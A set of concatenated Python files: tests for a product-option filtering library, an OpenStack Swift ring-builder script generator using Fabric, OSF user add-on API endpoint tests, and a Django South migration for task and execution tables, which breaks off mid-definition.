self.assertTrue(winnow.is_allowed_by(configured_version, self.base_version))
configured_option = deepcopy(BASE_PRODUCT)
configured_option[u"options"][u"color"] = [u"red", u"green"]
configured_option[u"options"][u"tool"] = [u"cnc"]
configured_version = WinnowVersion.add_doc(self.db, configured_option, {})
self.assertTrue(winnow.allows(self.base_version, configured_version))
def test_allows_subset_without_a_key(self):
configured_option = deepcopy(BASE_PRODUCT)
del configured_option[u"options"][u"color"]
configured_version = WinnowVersion.add_doc(self.db, configured_option, {})
self.assertTrue(winnow.allows(configured_version, self.base_version))
def test_allows_subset_with_an_extra_key(self):
configured_option = deepcopy(BASE_PRODUCT)
configured_option[u"options"][u"wheels"] = [u"big", u"small"]
configured_version = WinnowVersion.add_doc(self.db, configured_option, {})
self.assertTrue(winnow.allows(self.base_version, configured_version))
self.assertTrue(self.base_version.allows(configured_version))
def test_allows_fails(self):
configured_option = deepcopy(BASE_PRODUCT)
configured_option[u"options"][u"color"] = u"purple"
configured_version = WinnowVersion.add_doc(self.db, configured_option, {})
self.assertFalse(winnow.allows(self.base_version, configured_version))
self.assertFalse(self.base_version.allows(configured_version))
#
# def test_allows_fails(self):
#
# configured_option = deepcopy(BASE_PRODUCT)
# configured_option[u"options"][u"color"] = u"purple"
# configured_version = WinnowVersion.add_doc(self.db, configured_option, {})
# self.assertFalse(winnow.allows(self.base_version, configured_version))
# self.assertFalse(self.base_version.allows(configured_version))
class TestSieveMerge(unittest.TestCase):
def setUp(self):
self.db = MockKVStore()
self.base_version = WinnowVersion.add_doc(self.db, BASE_PRODUCT, {})
def test_does_a_merge(self):
other_dict = {u"name": u"something",
u"description": u"these are other options",
u"options":{
u"color": [u"red", u"blue"],
u"size": [u"big", u"medium", u"small"],
u"tool": [u"cnc", u"laser", u"plaster"],
u"days": [u"tuesday", u"thursday"],
u"drinks": [u"beer", u"coffee"],
u"snacks": [u"crisps", u"cheese", u"apple"]
}
}
expected = {u"name": u"table",
u"description": u"This is a very nice table",
u"options":{
u"color": [u"blue", u"red"],
u"size": [u"big", u"small"],
u"tool": [u"cnc", u"laser"],
u"material": [u"metal", u"plastic", u"wood"],
u"days": [u"thursday", u"tuesday"],
u"drinks": [u"beer", u"coffee"],
u"snacks": [u"apple", u"cheese", u"crisps"]
}
}
other_version = WinnowVersion.add_doc(self.db, other_dict, {})
merged = WinnowVersion.merged(self.db, BASE_PRODUCT, {}, self.base_version, other_version)
self.maxDiff = None
self.assertEqual(merged.kwargs[u"doc"], expected)
def test_match(self):
configured_product_1 = {u"name": u"cat",
u"description": u"This is a very nice table",
u"options":{
u"color": u"red",
u"size": u"big"
}
}
configured_product_2 = {u"name": u"dog",
u"description": u"This is a very nice table",
u"options":{
u"color": u"red",
}
}
configured_product_3 = {u"name": u"fish",
u"description": u"This is a very nice table",
u"options":{
u"color": u"red",
u"size": u"old"
}
}
configured_product_4 = {u"name": u"goat",
u"description": u"This is a very nice table",
u"options":{
u"color": [u"red", u"green"],
u"size": u"small"
}
}
possible = [WinnowVersion.add_doc(self.db, configured_product_1, {}),
WinnowVersion.add_doc(self.db, configured_product_2, {}),
WinnowVersion.add_doc(self.db, configured_product_3, {}),
WinnowVersion.add_doc(self.db, configured_product_4, {})]
found = self.base_version.filter_allows(possible)
self.assertEqual(set([f.kwargs[u"doc"][u"name"] for f in found]), set([u'cat', u'dog', u'goat']))
|
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright (c) 2014, Blue Box Group, Inc.
# Copyright (c) 2014, Craig Tracey <[email protected]>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import glob
import logging
import os
import shutil
import stat
import subprocess
import tempfile
from fabric.api import execute, parallel, put
from netifaces import interfaces, ifaddresses, AF_INET
from utils import RING_TYPES, get_devices
LOG = logging.getLogger(__name__)
class SwiftRingsDefinition(object):
def __init__(self, data=None):
self.ring_builder_cmd = "swift-ring-builder"
self.ports = {
'object': 6000,
'container': 6001,
'account': 6002,
}
self.replicas = 3
self.min_part_hours = 1
self.zones = {}
# Area to build new or update existing rings
self.workspace = tempfile.mkdtemp()
if data:
self.__dict__.update(data)
def __del__(self):
shutil.rmtree(self.workspace)
def __repr__(self):
return str(self.__dict__)
def _ring_create_command(self, ringtype):
return "%s %s/%s.builder create %d %d %d" % (
self.ring_builder_cmd, self.workspace, ringtype,
int(self.part_power), int(self.replicas),
int(self.min_part_hours))
def _ring_add_command(self, ringtype, zone, host, port, disk,
metadata, weight):
return "%s %s/%s.builder add %s-%s:%d/%s_%s %d" % (
self.ring_builder_cmd, self.workspace, ringtype, zone, host,
int(port), disk, metadata, int(weight))
def _ring_rebalance_command(self, ringtype, force=False):
if not force:
return "%s %s/%s.builder rebalance" % (
self.ring_builder_cmd, self.workspace, ringtype)
else:
return "%s %s/%s.builder rebalance --force" % (
self.ring_builder_cmd, self.workspace, ringtype)
def _ring_setweight_command(self, ringtype, zone, host, port,
disk, weight):
return "%s %s/%s.builder set_weight %s-%s:%d/%s %d" % (
self.ring_builder_cmd, self.workspace, ringtype, zone, host,
int(port), disk, int(weight))
def _ring_remove_command(self, ringtype, zone, host, port, disk):
return "%s %s/%s.builder remove %s-%s:%d/%s" % (
self.ring_builder_cmd, self.workspace, ringtype, zone, host,
int(port), disk)
def _ring_search_command(self, ringtype, zone, host, port, disk):
return "%s %s/%s.builder search %s-%s:%d/%s" % (
self.ring_builder_cmd, self.workspace, ringtype, zone, host,
int(port), disk)
@property
def nodes(self):
ret = set()
if self.zones and isinstance(self.zones, dict):
for zone, nodes in self.zones.iteritems():
ret.update(nodes.keys())
return ret
def generate_commands(self, rebalance=True, meta=None):
commands = []
ring_disks = get_devices(self.zones, metadata=meta)
for ringtype in RING_TYPES:
builder_present = os.path.exists("%s/%s.builder" %
(self.workspace, ringtype))
if not builder_present:
commands.append(self._ring_create_command(ringtype))
for zone, devices in ring_disks[ringtype].iteritems():
for device in devices:
port = self.ports[ringtype]
weight = device['weight']
disk = device['device']
node = device['ip']
metadata = device['metadata']
# When rings are not present or if device does not
# exist in ring, add it to the ring
# Else if the weight is to be set to 0 remove
# the device eor just update the weight
if not builder_present or \
not self._is_devpresent(ringtype, zone, node,
port, disk):
cmd = self._ring_add_command(ringtype, zone,
node, port,
disk, metadata,
weight)
else:
if int(weight) == 0:
cmd = self._ring_remove_command(ringtype,
zone, node,
port, disk)
else:
# Always set the weight of device
# Verified that setting weight (to same)
# value doesnt cause partitions to reassign
cmd = self._ring_setweight_command(ringtype,
zone,
node,
port,
disk,
weight)
commands.append(cmd)
if rebalance:
commands.append(self._ring_rebalance_command(ringtype))
return commands
def rebalance_commands(self):
commands = []
for ringtype in RING_TYPES:
builder_path = "%s/%s.builder" % (self.workspace, ringtype)
if not os.path.exists(builder_path):
raise Exception("Could not find '%s'" % builder_path)
commands.append(self._ring_rebalance_command(ringtype,
force=True))
return commands
def _update_workspace(self, outdir):
# Copy the builder files if all 3 exists, else create new
if os.path.exists(os.path.join(outdir, "account.builder")) and \
os.path.exists(os.path.join(outdir, "container.builder")) and \
os.path.exists(os.path.join(outdir, "object.builder")):
for filename in glob.glob(os.path.join(outdir, "*.builder")):
shutil.copy(filename, self.workspace)
def generate_script(self, outdir, name='ring_builder.sh',
rebalance=True, meta=None, rebalance_only=False):
self._update_workspace(outdir)
commands = ["#!/bin/bash\n"]
if not rebalance_only:
commands = commands + self.generate_commands(rebalance,
meta)
else:
commands = commands + self.rebalance_commands()
outfile = os.path.join(self.workspace, name)
f = open(outfile, 'w')
for command in commands:
f.write("%s\n" % command)
f.close()
st = os.stat(outfile)
os.chmod(outfile, st.st_mode | stat.S_IEXEC)
return outfile
def _is_devpresent(self, ringtype, zone, node, port, disk):
command = self._ring_search_command(ringtype, zone, node,
port, disk)
rc = subprocess.call(command, shell=True)
return rc == 0
def ip4_addresses():
ips = []
for interface in interfaces():
addresses = ifaddresses(interface)
if addresses and AF_INET in addresses:
for link in addresses[AF_INET]:
ips.append(link['addr'])
return ips
def ringsdef_helper(config, metadata, outputdir, rebalance_only=False):
ringsdef = SwiftRingsDefinition(config)
build_script = ringsdef.generate_script(outdir=outputdir,
meta=metadata,
rebalance_only=rebalance_only)
subprocess.call(build_script)
tempfiles = os.path.join(ringsdef.workspace, "*")
execute(_fab_copy_swift_directory, tempfiles, outputdir,
hosts=ringsdef.nodes)
return ringsdef.nodes
@parallel
def _fab_copy_swift_directory(local_files, remote_dir):
put(local_files, remote_dir, mirror_local_mode=True)
|
|
# -*- coding: utf-8 -*-
import abc
from nose.tools import * # noqa:
import re
import pytest
from api.base.settings.defaults import API_BASE
from tests.base import ApiAddonTestCase
from osf_tests.factories import AuthUserFactory
from addons.bitbucket.tests.factories import BitbucketAccountFactory
from addons.box.tests.factories import BoxAccountFactory
from addons.dataverse.tests.factories import DataverseAccountFactory
from addons.dropbox.tests.factories import DropboxAccountFactory
from addons.github.tests.factories import GitHubAccountFactory
from addons.googledrive.tests.factories import GoogleDriveAccountFactory
from addons.mendeley.tests.factories import MendeleyAccountFactory
from addons.owncloud.tests.factories import OwnCloudAccountFactory
from addons.s3.tests.factories import S3AccountFactory
from addons.zotero.tests.factories import ZoteroAccountFactory
class UserAddonListMixin(object):
def set_setting_list_url(self):
self.setting_list_url = '/{}users/{}/addons/'.format(
API_BASE, self.user._id
)
def test_settings_list_GET_returns_user_settings_if_present(self):
wrong_type = self.should_expect_errors()
res = self.app.get(
self.setting_list_url,
auth=self.user.auth)
if not wrong_type:
addon_data = res.json['data'][0]
assert_true(addon_data['attributes']['user_has_auth'])
assert_in(
self.node._id, addon_data['links']['accounts'][self.account_id]['nodes_connected'][0])
if wrong_type:
assert_equal(res.status_code, 200)
assert_equal(res.json['data'], [])
def test_settings_list_GET_returns_none_if_absent(self):
try:
if self.user.external_accounts.count():
self.user.external_accounts.clear()
self.user.delete_addon(self.short_name, auth=self.auth)
except ValueError:
# If addon was mandatory -- OSFStorage
pass
res = self.app.get(
self.setting_list_url,
auth=self.user.auth)
addon_data = res.json['data']
assert_equal(addon_data, [])
def test_settings_list_raises_error_if_PUT(self):
res = self.app.put_json_api(
self.setting_list_url,
{
'id': self.short_name,
'type': 'user-addons'
},
auth=self.user.auth,
expect_errors=True)
assert_equal(res.status_code, 405)
def test_settings_list_raises_error_if_PATCH(self):
res = self.app.patch_json_api(
self.setting_list_url,
{
'id': self.short_name,
'type': 'user-addons'
},
auth=self.user.auth,
expect_errors=True)
assert_equal(res.status_code, 405)
def test_settings_list_raises_error_if_DELETE(self):
res = self.app.delete(
self.setting_list_url,
auth=self.user.auth,
expect_errors=True)
assert_equal(res.status_code, 405)
def test_settings_list_raises_error_if_nonauthenticated(self):
res = self.app.get(
self.setting_list_url,
expect_errors=True)
assert_equal(res.status_code, 401)
def test_settings_list_user_cannot_view_other_user(self):
other_user = AuthUserFactory()
res = self.app.get(
self.setting_list_url,
auth=other_user.auth,
expect_errors=True)
assert_equal(res.status_code, 403)
class UserAddonDetailMixin(object):
def set_setting_detail_url(self):
self.setting_detail_url = '/{}users/{}/addons/{}/'.format(
API_BASE, self.user._id, self.short_name
)
def test_settings_detail_GET_returns_user_settings_if_present(self):
wrong_type = self.should_expect_errors()
res = self.app.get(
self.setting_detail_url,
auth=self.user.auth,
expect_errors=wrong_type)
if not wrong_type:
addon_data = res.json['data']
assert_true(addon_data['attributes']['user_has_auth'])
assert_in(
self.node._id,
addon_data['links']['accounts'][self.account_id]['nodes_connected'][0]
)
if wrong_type:
assert_equal(res.status_code, 404)
def test_settings_detail_GET_raises_error_if_absent(self):
wrong_type = self.should_expect_errors()
try:
if self.user.external_accounts.count():
self.user.external_accounts.clear()
self.user.delete_addon(self.short_name, auth=self.auth)
except ValueError:
# If addon was mandatory -- OSFStorage
pass
res = self.app.get(
self.setting_detail_url,
auth=self.user.auth,
expect_errors=True)
assert_equal(res.status_code, 404)
if not wrong_type:
assert_in(
'Requested addon not enabled',
res.json['errors'][0]['detail'])
if wrong_type:
assert re.match(
r'Requested addon un(available|recognized)',
(res.json['errors'][0]['detail']))
def test_settings_detail_raises_error_if_PUT(self):
res = self.app.put_json_api(self.setting_detail_url, {
'id': self.short_name,
'type': 'user-addon-detail'
}, auth=self.user.auth,
expect_errors=True)
assert_equal(res.status_code, 405)
def test_settings_detail_raises_error_if_PATCH(self):
res = self.app.patch_json_api(self.setting_detail_url, {
'id': self.short_name,
'type': 'user-addon-detail'
}, auth=self.user.auth,
expect_errors=True)
assert_equal(res.status_code, 405)
def test_settings_detail_raises_error_if_DELETE(self):
res = self.app.delete(
self.setting_detail_url,
auth=self.user.auth,
expect_errors=True)
assert_equal(res.status_code, 405)
def test_settings_detail_raises_error_if_nonauthenticated(self):
res = self.app.get(
self.setting_detail_url,
expect_errors=True)
assert_equal(res.status_code, 401)
def test_settings_detail_user_cannot_view_other_user(self):
other_user = AuthUserFactory()
res = self.app.get(
self.setting_detail_url,
auth=other_user.auth,
expect_errors=True)
assert_equal(res.status_code, 403)
class UserAddonAccountListMixin(object):
def set_account_list_url(self):
self.account_list_url = '/{}users/{}/addons/{}/accounts/'.format(
API_BASE, self.user._id, self.short_name
)
def test_account_list_GET_returns_accounts_if_present(self):
wrong_type = self.should_expect_errors()
res = self.app.get(
self.account_list_url,
auth=self.user.auth,
expect_errors=wrong_type)
if not wrong_type:
addon_data = res.json['data'][0]
assert_equal(addon_data['id'], self.account._id)
assert_equal(
addon_data['attributes']['display_name'],
self.account.display_name)
assert_equal(
addon_data['attributes']['provider'],
self.account.provider)
assert_equal(
addon_data['attributes']['profile_url'],
self.account.profile_url)
if wrong_type:
assert_equal(res.status_code, 404)
def test_account_list_raises_error_if_absent(self):
wrong_type = self.should_expect_errors()
try:
if self.user.external_accounts.count():
self.user.external_accounts.clear()
self.user.delete_addon(self.short_name, auth=self.auth)
except ValueError:
# If addon was mandatory -- OSFStorage
pass
res = self.app.get(
self.account_list_url,
auth=self.user.auth,
expect_errors=True)
assert_equal(res.status_code, 404)
if not wrong_type:
assert_in(
'Requested addon not enabled',
res.json['errors'][0]['detail'])
if wrong_type:
assert re.match(
r'Requested addon un(available|recognized)',
(res.json['errors'][0]['detail']))
def test_account_list_raises_error_if_PUT(self):
res = self.app.put_json_api(self.account_list_url, {
'id': self.short_name,
'type': 'user-external_accounts'
}, auth=self.user.auth,
expect_errors=True)
assert_equal(res.status_code, 405)
def test_account_list_raises_error_if_PATCH(self):
res = self.app.patch_json_api(self.account_list_url, {
'id': self.short_name,
'type': 'user-external_accounts'
}, auth=self.user.auth,
expect_errors=True)
assert_equal(res.status_code, 405)
def test_account_list_raises_error_if_DELETE(self):
res = self.app.delete(
self.account_list_url,
auth=self.user.auth,
expect_errors=True)
assert_equal(res.status_code, 405)
def test_account_list_raises_error_if_nonauthenticated(self):
res = self.app.get(
self.account_list_url,
expect_errors=True)
assert_equal(res.status_code, 401)
def test_account_list_user_cannot_view_other_user(self):
other_user = AuthUserFactory()
res = self.app.get(
self.account_list_url,
auth=other_user.auth,
expect_errors=True)
assert_equal(res.status_code, 403)
class UserAddonAccountDetailMixin(object):
def set_account_detail_url(self):
self.account_detail_url = '/{}users/{}/addons/{}/accounts/{}/'.format(
API_BASE, self.user._id, self.short_name, self.account_id
)
def test_account_detail_GET_returns_account_if_enabled(self):
wrong_type = self.should_expect_errors()
res = self.app.get(
self.account_detail_url,
auth=self.user.auth,
expect_errors=wrong_type)
if not wrong_type:
addon_data = res.json['data']
assert_equal(addon_data['id'], self.account._id)
assert_equal(
addon_data['attributes']['display_name'],
self.account.display_name)
assert_equal(
addon_data['attributes']['provider'],
self.account.provider)
assert_equal(
addon_data['attributes']['profile_url'],
self.account.profile_url)
if wrong_type:
assert_equal(res.status_code, 404)
def test_account_detail_raises_error_if_not_found(self):
wrong_type = self.should_expect_errors()
try:
if self.user.external_accounts.count():
self.user.external_accounts.clear()
self.user.delete_addon(self.short_name, auth=self.auth)
except ValueError:
# If addon was mandatory -- OSFStorage
pass
res = self.app.get(
self.account_detail_url,
auth=self.user.auth,
expect_errors=True)
assert_equal(res.status_code, 404)
if not wrong_type:
assert_in(
'Requested addon not enabled',
res.json['errors'][0]['detail'])
if wrong_type:
assert re.match(
r'Requested addon un(available|recognized)',
(res.json['errors'][0]['detail']))
def test_account_detail_raises_error_if_PUT(self):
res = self.app.put_json_api(self.account_detail_url, {
'id': self.short_name,
'type': 'user-external_account-detail'
}, auth=self.user.auth,
expect_errors=True)
assert_equal(res.status_code, 405)
def test_account_detail_raises_error_if_PATCH(self):
res = self.app.patch_json_api(self.account_detail_url, {
'id': self.short_name,
'type': 'user-external_account-detail'
}, auth=self.user.auth,
expect_errors=True)
assert_equal(res.status_code, 405)
def test_account_detail_raises_error_if_DELETE(self):
res = self.app.delete(
self.account_detail_url,
auth=self.user.auth,
expect_errors=True)
assert_equal(res.status_code, 405)
def test_account_detail_raises_error_if_nonauthenticated(self):
res = self.app.get(
self.account_detail_url,
expect_errors=True)
assert_equal(res.status_code, 401)
def test_account_detail_user_cannot_view_other_user(self):
other_user = AuthUserFactory()
res = self.app.get(
self.account_detail_url,
auth=other_user.auth,
expect_errors=True)
assert_equal(res.status_code, 403)
class UserAddonTestSuiteMixin(
UserAddonListMixin,
UserAddonDetailMixin,
UserAddonAccountListMixin,
UserAddonAccountDetailMixin):
def set_urls(self):
self.set_setting_list_url()
self.set_setting_detail_url()
self.set_account_list_url()
self.set_account_detail_url()
def should_expect_errors(self, success_types=('OAUTH', )):
return self.addon_type not in success_types
class UserOAuthAddonTestSuiteMixin(UserAddonTestSuiteMixin):
addon_type = 'OAUTH'
@abc.abstractproperty
def AccountFactory(self):
pass
class UserUnmanageableAddonTestSuiteMixin(UserAddonTestSuiteMixin):
addon_type = 'UNMANAGEABLE'
# UNMANAGEABLE
class TestUserForwardAddon(
UserUnmanageableAddonTestSuiteMixin,
ApiAddonTestCase):
short_name = 'forward'
class TestUserOsfStorageAddon(
UserUnmanageableAddonTestSuiteMixin,
ApiAddonTestCase):
short_name = 'osfstorage'
class TestUserTwoFactorAddon(
UserUnmanageableAddonTestSuiteMixin,
ApiAddonTestCase):
short_name = 'twofactor'
class TestUserWikiAddon(UserUnmanageableAddonTestSuiteMixin, ApiAddonTestCase):
short_name = 'wiki'
# OAUTH
class TestUserBitbucketAddon(UserOAuthAddonTestSuiteMixin, ApiAddonTestCase):
short_name = 'bitbucket'
AccountFactory = BitbucketAccountFactory
class TestUserBoxAddon(UserOAuthAddonTestSuiteMixin, ApiAddonTestCase):
short_name = 'box'
AccountFactory = BoxAccountFactory
class TestUserDataverseAddon(UserOAuthAddonTestSuiteMixin, ApiAddonTestCase):
short_name = 'dataverse'
AccountFactory = DataverseAccountFactory
class TestUserDropboxAddon(UserOAuthAddonTestSuiteMixin, ApiAddonTestCase):
short_name = 'dropbox'
AccountFactory = DropboxAccountFactory
class TestUserGitHubAddon(UserOAuthAddonTestSuiteMixin, ApiAddonTestCase):
short_name = 'github'
AccountFactory = GitHubAccountFactory
class TestUserGoogleDriveAddon(UserOAuthAddonTestSuiteMixin, ApiAddonTestCase):
short_name = 'googledrive'
AccountFactory = GoogleDriveAccountFactory
class TestUserMendeleyAddon(UserOAuthAddonTestSuiteMixin, ApiAddonTestCase):
short_name = 'mendeley'
AccountFactory = MendeleyAccountFactory
class TestUserS3Addon(UserOAuthAddonTestSuiteMixin, ApiAddonTestCase):
short_name = 's3'
AccountFactory = S3AccountFactory
class TestUserZoteroAddon(UserOAuthAddonTestSuiteMixin, ApiAddonTestCase):
short_name = 'zotero'
AccountFactory = ZoteroAccountFactory
class TestUserOwnCloudAddon(UserOAuthAddonTestSuiteMixin, ApiAddonTestCase):
short_name = 'owncloud'
AccountFactory = OwnCloudAccountFactory
@pytest.mark.skip('Unskip when figshare v2 addon is ported')
class TestUserFigshareAddon(UserOAuthAddonTestSuiteMixin, ApiAddonTestCase):
short_name = 'figshare'
# AccountFactory = FigshareAccountFactory
class TestUserInvalidAddon(UserAddonTestSuiteMixin, ApiAddonTestCase):
addon_type = 'INVALID'
short_name = 'fake'
|
|
# -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
depends_on = (
("account", "0001_initial"),
)
def forwards(self, orm):
# Adding model 'Task'
db.create_table(u'task_task', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('name', self.gf('django.db.models.fields.CharField')(max_length=128)),
('description', self.gf('django.db.models.fields.TextField')(blank=True)),
('application', self.gf('django.db.models.fields.related.ForeignKey')(related_name='tasks', to=orm['core.Application'])),
))
db.send_create_signal(u'task', ['Task'])
# Adding unique constraint on 'Task', fields ['application', 'name']
db.create_unique(u'task_task', ['application_id', 'name'])
# Adding model 'TaskParameter'
db.create_table(u'task_taskparameter', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('task', self.gf('django.db.models.fields.related.ForeignKey')(related_name='parameters', to=orm['task.Task'])),
('name', self.gf('django.db.models.fields.CharField')(max_length=128)),
('default_value', self.gf('django.db.models.fields.CharField')(max_length=128)),
('description', self.gf('django.db.models.fields.TextField')(blank=True)),
('order', self.gf('django.db.models.fields.IntegerField')()),
))
db.send_create_signal(u'task', ['TaskParameter'])
# Adding model 'TaskCommand'
db.create_table(u'task_taskcommand', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('task', self.gf('django.db.models.fields.related.ForeignKey')(related_name='commands', to=orm['task.Task'])),
('command', self.gf('django.db.models.fields.TextField')()),
('order', self.gf('django.db.models.fields.IntegerField')()),
))
db.send_create_signal(u'task', ['TaskCommand'])
# Adding M2M table for field roles on 'TaskCommand'
m2m_table_name = db.shorten_name(u'task_taskcommand_roles')
db.create_table(m2m_table_name, (
('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),
('taskcommand', models.ForeignKey(orm[u'task.taskcommand'], null=False)),
('serverrole', models.ForeignKey(orm[u'core.serverrole'], null=False))
))
db.create_unique(m2m_table_name, ['taskcommand_id', 'serverrole_id'])
# Adding model 'Execution'
db.create_table(u'task_execution', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('task', self.gf('django.db.models.fields.related.ForeignKey')(related_name='executions', to=orm['task.Task'])),
('time_created', self.gf('django.db.models.fields.DateTimeField')(auto_now_add=True, blank=True)),
('time_start', self.gf('django.db.models.fields.DateTimeField')(null=True, blank=True)),
('time_end', self.gf('django.db.models.fields.DateTimeField')(null=True, blank=True)),
('time', self.gf('django.db.models.fields.IntegerField')(null=True, blank=True)),
('environment', self.gf('django.db.models.fields.related.ForeignKey')(related_name='executions', to=orm['core.Environment'])),
('user', self.gf('django.db.models.fields.related.ForeignKey')(related_name='executions', to=orm['account.CustomUser'])),
('status', self.gf('django.db.models.fields.IntegerField')(default=3)),
))
db.send_create_signal(u'task', ['Execution'])
# Adding model 'ExecutionParameter'
db.create_table(u'task_executionparameter', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('execution', self.gf('django.db.models.fields.related.ForeignKey')(related_name='parameters', to=orm['task.Execution'])),
('name', self.gf('django.db.models.fields.CharField')(max_length=128)),
('value', self.gf('django.db.models.fields.CharField')(max_length=128)),
))
db.send_create_signal(u'task', ['ExecutionParameter'])
# Adding model 'ExecutionCommand'
db.create_table(u'task_executioncommand', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('execution', self.gf('django.db.models.fields.related.ForeignKey')(related_name='commands', to=orm['task.Execution'])),
('command', self.gf('django.db.models.fields.TextField')()),
))
db.send_create_signal(u'task', ['ExecutionCommand'])
# Adding M2M table for field roles on 'ExecutionCommand'
m2m_table_name = db.shorten_name(u'task_executioncommand_roles')
db.create_table(m2m_table_name, (
('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),
('executioncommand', models.ForeignKey(orm[u'task.executioncommand'], null=False)),
('serverrole', models.ForeignKey(orm[u'core.serverrole'], null=False))
))
db.create_unique(m2m_table_name, ['executioncommand_id', 'serverrole_id'])
# Adding model 'ExecutionCommandServer'
db.create_table(u'task_executioncommandserver', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('execution_command', self.gf('django.db.models.fields.related.ForeignKey')(related_name='servers', to=orm['task.ExecutionCommand'])),
('status', self.gf('django.db.models.fields.IntegerField')(default=3)),
('time_start', self.gf('django.db.models.fields.DateTimeField')(null=True, blank=True)),
('time_end', self.gf('django.db.models.fields.DateTimeField')(null=True, blank=True)),
('time', self.gf('django.db.models.fields.IntegerField')(null=True, blank=True)),
('return_code', self.gf('django.db.models.fields.IntegerField')(null=True, blank=True)),
('server', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['core.Server'])),
('output', self.gf('django.db.models.fields.TextField')(blank=True)),
))
db.send_create_signal(u'task', ['ExecutionCommandServer'])
# Adding model 'ExecutionLiveLog'
db.create_table(u'task_executionlivelog', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('execution', self.gf('django.db.models.fields.related.ForeignKey')(related_name='live_logs', to=orm['task.Execution'])),
('event', self.gf('django.db.models.fields.CharField')(max_length=128)),
('data', self.gf('django.db.models.fields.TextField')(blank=True)),
))
db.send_create_signal(u'task', ['ExecutionLiveLog'])
def backwards(self, orm):
# Removing unique constraint on 'Task', fields ['application', 'name']
db.delete_unique(u'task_task', ['application_id', 'name'])
# Deleting model 'Task'
db.delete_table(u'task_task')
# Deleting model 'TaskParameter'
db.delete_table(u'task_taskparameter')
# Deleting model 'TaskCommand'
db.delete_table(u'task_taskcommand')
# Removing M2M table for field roles on 'TaskCommand'
db.delete_table(db.shorten_name(u'task_taskcommand_roles'))
# Deleting model 'Execution'
db.delete_table(u'task_execution')
# Deleting model 'ExecutionParameter'
db.delete_table(u'task_executionparameter')
# Deleting model 'ExecutionCommand'
db.delete_table(u'task_executioncommand')
# Removing M2M table for field roles on 'ExecutionCommand'
db.delete_table(db.shorten_name(u'task_executioncommand_roles'))
# Deleting model 'ExecutionCommandServer'
db.delete_table(u'task_executioncommandserver')
# Deleting model 'ExecutionLiveLog'
db.delete_table(u'task_executionlivelog')
models = {
u'account.customuser': {
'Meta': {'object_name': 'CustomUser'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'unique': 'True', 'max_length': '254'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "u'user_set'", 'blank': 'True', 'to': u"orm['auth.Group']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "u'user_set'", 'blank': 'True', 'to': u"orm['auth.Permission']"})
},
u'auth.group': {
'Meta': {'object_name': 'Group'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
u'auth.permission': {
'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
u'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'core.application': {
'Meta': {'unique_together': "(('department', 'name'),)", 'object_name': 'Application'},
'department': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'applications'", 'to': u"orm['core.Department']"}),
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128'})
},
u'core.department': {
'Meta': {'object_name': 'Department'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '128'})
},
u'core.environment': {
'Meta': {'unique_together': "(('application', 'name'),)", 'object_name': 'Environment'},
'application': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'environments'", 'to': u"orm['core.Application']"}),
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
